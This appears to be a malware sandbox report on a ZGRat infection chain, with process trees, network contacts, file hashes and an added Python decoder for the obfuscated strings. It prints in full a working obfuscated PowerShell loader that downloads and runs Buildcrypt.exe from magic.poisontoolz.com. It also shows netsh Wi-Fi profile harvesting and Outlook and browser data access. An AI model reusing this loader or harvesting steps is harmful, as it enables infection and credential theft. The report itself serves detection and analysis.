Analysis: behavioral4
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1000 set thread context of 4664 | N/A | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Buildcrypt.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Docs.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dxkEOJ($jqyPVSgWqmmMsu, $aNoKIHhsKCDNWp){[IO.File]::WriteAllBytes($jqyPVSgWqmmMsu, $aNoKIHhsKCDNWp)};function jjdeCQWVxw($jqyPVSgWqmmMsu){if($jqyPVSgWqmmMsu.EndsWith((sqawNbuSbNoQJZv @(58322,58376,58384,58384))) -eq $True){rundll32.exe $jqyPVSgWqmmMsu }elseif($jqyPVSgWqmmMsu.EndsWith((sqawNbuSbNoQJZv @(58322,58388,58391,58325))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $jqyPVSgWqmmMsu}elseif($jqyPVSgWqmmMsu.EndsWith((sqawNbuSbNoQJZv @(58322,58385,58391,58381))) -eq $True){misexec /qn /i $jqyPVSgWqmmMsu}else{Start-Process $jqyPVSgWqmmMsu}};function HbrgwLHwrnHIIKcXF($PsSShlejHlmIATZ){$DiupfoBkkti = New-Object (sqawNbuSbNoQJZv @(58354,58377,58392,58322,58363,58377,58374,58343,58384,58381,58377,58386,58392));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$aNoKIHhsKCDNWp = $DiupfoBkkti.DownloadData($PsSShlejHlmIATZ);return $aNoKIHhsKCDNWp};function sqawNbuSbNoQJZv($IGSmIy){$qiARGdapNw=58276;$oaVnqUhEZ=$Null;foreach($PnrRNHiYycYQVcn in $IGSmIy){$oaVnqUhEZ+=[char]($PnrRNHiYycYQVcn-$qiARGdapNw)};return $oaVnqUhEZ};function SSSHxFUz(){$SrNKPGroYNNtLyR = $env:AppData + '\';$mVYpdLNFBXXciTDAvNH = $SrNKPGroYNNtLyR + 'Document.pdf';If(Test-Path -Path $mVYpdLNFBXXciTDAvNH){Invoke-Item $mVYpdLNFBXXciTDAvNH;}Else{ $lyGsxYZsmNE = HbrgwLHwrnHIIKcXF (sqawNbuSbNoQJZv @(58380,58392,58392,58388,58391,58334,58323,58323,58385,58373,58379,58381,58375,58322,58388,58387,58381,58391,58387,58386,58392,58387,58387,58384,58398,58322,58375,58387,58385,58323,58344,58387,58375,58393,58385,58377,58386,58392,58322,58388,58376,58378));dxkEOJ $mVYpdLNFBXXciTDAvNH $lyGsxYZsmNE;Invoke-Item $mVYpdLNFBXXciTDAvNH;};$bblLmj = $SrNKPGroYNNtLyR + 'Buildcrypt.exe'; if (Test-Path -Path $bblLmj){jjdeCQWVxw $bblLmj;}Else{ $SlNerqupbdAkKp = HbrgwLHwrnHIIKcXF (sqawNbuSbNoQJZv @(58380,58392,58392,58388,58391,58334,58323,58323,58385,58373,58379,58381,58375,58322,58388,58387,58381,58391,58387,58386,58392,58387,58387,58384,58398,58322,58375,58387,58385,58323,58342,58393,58381,58384,58376,58375,58390,58397,58388,58392,58322,58377,58396,58377));dxkEOJ $bblLmj $SlNerqupbdAkKp;jjdeCQWVxw $bblLmj;};;;;}SSSHxFUz;
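The powershell.exe command line above is the stage that drops Document.pdf and Buildcrypt.exe. Every string in it is hidden as an integer array and rebuilt at run time by the loader's own sqawNbuSbNoQJZv function, which subtracts the constant 58276 from each element and casts to a char. The decoder below is an added analyst example, not code from the report or from the sample: it pulls the @(...) arrays out of the command-line text, applies the same subtraction, and recovers the key from a known plaintext prefix for the case where the constant is not visible. SAMPLE is the six arrays copied from the command line above; the decoded values (the three file extensions tested by jjdeCQWVxw, the Net.WebClient type name, and two https URLs on magic.poisontoolz.com) follow from that arithmetic and are not taken from any other source.

```python
import re

# Key hard-coded in the loader's decode routine ($qiARGdapNw = 58276).
KEY = 58276

# Excerpt copied from the powershell.exe command line in the report: the six
# integer arrays the loader hands to sqawNbuSbNoQJZv, in order of appearance.
SAMPLE = (
    "@(58322,58376,58384,58384) "
    "@(58322,58388,58391,58325) "
    "@(58322,58385,58391,58381) "
    "@(58354,58377,58392,58322,58363,58377,58374,58343,58384,58381,58377,58386,58392) "
    "@(58380,58392,58392,58388,58391,58334,58323,58323,58385,58373,58379,58381,58375,"
    "58322,58388,58387,58381,58391,58387,58386,58392,58387,58387,58384,58398,58322,"
    "58375,58387,58385,58323,58344,58387,58375,58393,58385,58377,58386,58392,58322,"
    "58388,58376,58378) "
    "@(58380,58392,58392,58388,58391,58334,58323,58323,58385,58373,58379,58381,58375,"
    "58322,58388,58387,58381,58391,58387,58386,58392,58387,58387,58384,58398,58322,"
    "58375,58387,58385,58323,58342,58393,58381,58384,58376,58375,58390,58397,58388,"
    "58392,58322,58377,58396,58377)"
)

# A PowerShell integer array literal: @(1,2,3), tolerating whitespace and line wraps.
ARRAY_RE = re.compile(r"@\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)")


def extract_arrays(text):
    """Return every @(...) integer array found in text, in order of appearance."""
    return [
        [int(n) for n in re.sub(r"\s+", "", m.group(1)).split(",")]
        for m in ARRAY_RE.finditer(text)
    ]


def decode(codes, key=KEY):
    """Reverse the loader's transform: each element is ord(char) + key."""
    return "".join(chr(c - key) for c in codes)


def recover_key(codes, known_prefix):
    """Derive the additive key from a known plaintext prefix (e.g. 'https://').

    Returns None when the array is too short or the prefix does not fit, so a
    wrong guess is reported rather than silently producing garbage.
    """
    if len(codes) < len(known_prefix):
        return None
    key = codes[0] - ord(known_prefix[0])
    if all(c - key == ord(p) for c, p in zip(codes, known_prefix)):
        return key
    return None


def decode_cmdline(text, key=KEY):
    """Decode every array in a command line, in order."""
    return [decode(a, key) for a in extract_arrays(text)]


def iocs(text, key=KEY):
    """Only the decoded strings that are URLs: the loader's download targets."""
    return [s for s in decode_cmdline(text, key) if s.startswith(("http://", "https://"))]


if __name__ == "__main__":
    for s in decode_cmdline(SAMPLE):
        print(repr(s))
```

Reading the decoded strings back against the command line: the first three are the extension checks in jjdeCQWVxw (.dll goes to rundll32.exe, .ps1 to a child powershell.exe, .msi to the installer), and the .msi branch invokes "misexec", which is a typo in the loader, so that branch never actually runs. Buildcrypt.exe has none of those extensions and so falls through to Start-Process, which matches the "Executes dropped EXE" rows for C:\Users\Admin\AppData\Roaming\Buildcrypt.exe above. The decoded host is the same magic.poisontoolz.com that appears in the report's network tables.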
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Document.pdf"
C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
"C:\Users\Admin\AppData\Roaming\Buildcrypt.exe"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=B1BA23CBB6B8ADE984E66F02BD8FFBCB --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=B1BA23CBB6B8ADE984E66F02BD8FFBCB --renderer-client-id=2 --mojo-platform-channel-handle=1704 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A4AFFB00DA70C44E89F0006F7A791B52 --mojo-platform-channel-handle=1728 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=0DAD23F905662147322197BCAE29E9B2 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=0DAD23F905662147322197BCAE29E9B2 --renderer-client-id=4 --mojo-platform-channel-handle=2160 --allow-no-sandbox-job /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8F6D819C2C95458AFCD482D7629D9A50 --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9B94B64419BE447393C0FAA7D9D790F7 --mojo-platform-channel-handle=2844 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4F5F8B806EAD2D2C82F04826F782E692 --mojo-platform-channel-handle=2928 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 169.0.37.23.in-addr.arpa | udp |
| US | 13.85.23.86:443 | | tcp |
| US | 8.8.8.8:53 | 23.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.135.233:443 | discordapp.com | tcp |
| US | 104.18.114.97:80 | icanhazip.com | tcp |
| US | 162.159.135.233:443 | discordapp.com | tcp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 152.199.19.74:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 51.11.168.232:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 51.11.168.232:443 | | tcp |
| N/A | 51.11.168.232:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| GB | 104.77.160.31:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 13.85.23.86:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 20.242.39.171:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 13.85.23.86:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 104.18.114.97:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 104.18.114.97:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 51.38.43.18:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 31.14.70.246:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| GB | 96.16.110.114:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
Files
memory/952-0-0x0000000071B40000-0x00000000722F0000-memory.dmp
memory/952-2-0x0000000002800000-0x0000000002836000-memory.dmp
memory/952-1-0x0000000004D30000-0x0000000004D40000-memory.dmp
memory/952-3-0x0000000005370000-0x0000000005998000-memory.dmp
memory/952-4-0x0000000005180000-0x00000000051A2000-memory.dmp
memory/952-6-0x0000000005AC0000-0x0000000005B26000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4somwvmw.4ed.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/952-5-0x0000000005A50000-0x0000000005AB6000-memory.dmp
memory/952-16-0x0000000005C90000-0x0000000005FE4000-memory.dmp
memory/952-17-0x00000000061B0000-0x00000000061CE000-memory.dmp
memory/952-18-0x0000000006200000-0x000000000624C000-memory.dmp
memory/952-19-0x0000000004D30000-0x0000000004D40000-memory.dmp
memory/952-22-0x0000000006740000-0x0000000006762000-memory.dmp
memory/952-21-0x00000000066D0000-0x00000000066EA000-memory.dmp
memory/952-20-0x0000000007390000-0x0000000007426000-memory.dmp
memory/952-23-0x00000000079E0000-0x0000000007F84000-memory.dmp
memory/952-24-0x0000000008610000-0x0000000008C8A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
| MD5 | 380888258d0c8d18da63e80591a4e0f3 |
| SHA1 | 70ef5767c29304806ccc4cd136d9c5bfd8dcf403 |
| SHA256 | eaaefbc4c960dca1de30c44f0fccbbefdb9c3e0e243e7ff5579316b99206b8e0 |
| SHA512 | 63104e4e2e6b260522c26a28287684bb8dab433d4b03396e30b478288980d15d4d259d873f1f59eda364ec777bcdc79f481b11890178a012f2bc483497c4e3b3 |
memory/1000-40-0x0000000000700000-0x000000000071C000-memory.dmp
memory/1000-41-0x0000000071B40000-0x00000000722F0000-memory.dmp
memory/1000-42-0x0000000005100000-0x0000000005110000-memory.dmp
C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
| MD5 | 1146d3a15130bd2c5fdfae7ea6cd78a3 |
| SHA1 | 0a2a1406b135a5f2b7c57aec1c8cdb53c1b6b22f |
| SHA256 | 0f5890a4dc9f8f4ae0967c8958cf02f70009dd3748268d33c8acf06226cdba2a |
| SHA512 | dd6cebb5b0bf8e06d32da44fd9d1d12ee7c0e88efd0fe80a62f9cc5bc6c0fc8266f9d1ca9883e1f12039e2587a52f8f679d00d7cb506115204435779d6c7dc96 |
C:\Users\Admin\AppData\Roaming\Document.pdf
| MD5 | 80a2593453c09724d152e841a3ff0865 |
| SHA1 | c73c293d18aac71c530d69ea03314f064f5c6386 |
| SHA256 | 71d885fd0734c915b43ed11d45750aa67c53a11d6a95c9c8323d9fd6e3b413cd |
| SHA512 | ff131d439c8e06a789fa82ab7d2640ba87ab03b165f6bbf0d8048baad81c797e45c96000312c37dd5d1a53a2996ce7d3b6ccab09470d52840e4e8344f5b04f67 |
memory/1000-44-0x0000000006A80000-0x0000000006C8A000-memory.dmp
memory/1000-45-0x0000000006A80000-0x0000000006C84000-memory.dmp
